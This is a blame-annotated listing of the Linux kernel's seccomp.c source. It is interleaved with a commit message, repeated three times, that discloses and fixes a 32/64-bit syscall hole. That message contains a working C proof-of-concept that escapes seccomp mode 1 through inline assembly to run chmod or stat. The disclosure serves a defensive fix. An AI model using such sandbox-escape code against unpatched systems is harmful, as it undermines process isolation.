2005-04-17 06:20:36 +08:00
|
|
|
/*
|
|
|
|
* linux/kernel/seccomp.c
|
|
|
|
*
|
|
|
|
* Copyright 2004-2005 Andrea Arcangeli <andrea@cpushare.com>
|
|
|
|
*
|
|
|
|
* This defines a simple but solid secure-computing mode.
|
|
|
|
*/
|
|
|
|
|
|
|
|
#include <linux/seccomp.h>
|
|
|
|
#include <linux/sched.h>
|
x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-28 15:25:54 +08:00
|
|
|
#include <linux/compat.h>
|
2005-04-17 06:20:36 +08:00
|
|
|
|
|
|
|
/* #define SECCOMP_DEBUG 1 */
|
2007-07-16 14:41:32 +08:00
|
|
|
#define NR_SECCOMP_MODES 1
|
2005-04-17 06:20:36 +08:00
|
|
|
|
|
|
|
/*
|
|
|
|
* Secure computing mode 1 allows only read/write/exit/sigreturn.
|
|
|
|
* To be fully secure this must be combined with rlimit
|
|
|
|
* to limit the stack allocations too.
|
|
|
|
*/
|
|
|
|
static int mode1_syscalls[] = {
|
|
|
|
__NR_seccomp_read, __NR_seccomp_write, __NR_seccomp_exit, __NR_seccomp_sigreturn,
|
|
|
|
0, /* null terminated */
|
|
|
|
};
|
|
|
|
|
x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-28 15:25:54 +08:00
|
|
|
#ifdef CONFIG_COMPAT
|
2005-04-17 06:20:36 +08:00
|
|
|
static int mode1_syscalls_32[] = {
|
|
|
|
__NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32,
|
|
|
|
0, /* null terminated */
|
|
|
|
};
|
|
|
|
#endif
|
|
|
|
|
|
|
|
void __secure_computing(int this_syscall)
|
|
|
|
{
|
|
|
|
int mode = current->seccomp.mode;
|
|
|
|
int * syscall;
|
|
|
|
|
|
|
|
switch (mode) {
|
|
|
|
case 1:
|
|
|
|
syscall = mode1_syscalls;
|
x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-28 15:25:54 +08:00
|
|
|
#ifdef CONFIG_COMPAT
|
|
|
|
if (is_compat_task())
|
2005-04-17 06:20:36 +08:00
|
|
|
syscall = mode1_syscalls_32;
|
|
|
|
#endif
|
|
|
|
do {
|
|
|
|
if (*syscall == this_syscall)
|
|
|
|
return;
|
|
|
|
} while (*++syscall);
|
|
|
|
break;
|
|
|
|
default:
|
|
|
|
BUG();
|
|
|
|
}
|
|
|
|
|
|
|
|
#ifdef SECCOMP_DEBUG
|
|
|
|
dump_stack();
|
|
|
|
#endif
|
|
|
|
do_exit(SIGKILL);
|
|
|
|
}
|
2007-07-16 14:41:32 +08:00
|
|
|
|
|
|
|
long prctl_get_seccomp(void)
|
|
|
|
{
|
|
|
|
return current->seccomp.mode;
|
|
|
|
}
|
|
|
|
|
|
|
|
long prctl_set_seccomp(unsigned long seccomp_mode)
|
|
|
|
{
|
|
|
|
long ret;
|
|
|
|
|
|
|
|
/* can set it only once to be even more secure */
|
|
|
|
ret = -EPERM;
|
|
|
|
if (unlikely(current->seccomp.mode))
|
|
|
|
goto out;
|
|
|
|
|
|
|
|
ret = -EINVAL;
|
|
|
|
if (seccomp_mode && seccomp_mode <= NR_SECCOMP_MODES) {
|
|
|
|
current->seccomp.mode = seccomp_mode;
|
|
|
|
set_thread_flag(TIF_SECCOMP);
|
2007-07-16 14:41:33 +08:00
|
|
|
#ifdef TIF_NOTSC
|
|
|
|
disable_TSC();
|
|
|
|
#endif
|
2007-07-16 14:41:32 +08:00
|
|
|
ret = 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
out:
|
|
|
|
return ret;
|
|
|
|
}
|